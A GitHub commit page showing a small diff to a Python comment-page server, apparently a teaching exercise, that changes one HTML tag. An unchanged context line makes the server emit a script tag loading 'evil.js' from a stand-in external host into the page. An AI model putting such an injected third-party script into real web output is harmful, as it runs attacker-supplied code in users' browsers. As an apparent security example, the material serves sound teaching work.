There was an error while loading. Please reload this page.
1 parent f5e5c55 commit f7bc95eCopy full SHA for f7bc95e
2 files changed
src/server10.py
@@ -99,7 +99,7 @@ def show_comments(session):
99
out += "<i>by " + html.escape(who) + "</i></p>"
100
101
out += "<link rel=stylesheet src=/comment.css>"
102
- out += "<label></label>"
+ out += "<strong></strong>"
103
out += "<script src=/comment.js></script>"
104
out += "<script src=https://example.com/evil.js></script>"
105
return out
src/server12.py
@@ -124,7 +124,7 @@ def show_comments(session):
124
125
126
127
128
129
130
0 commit comments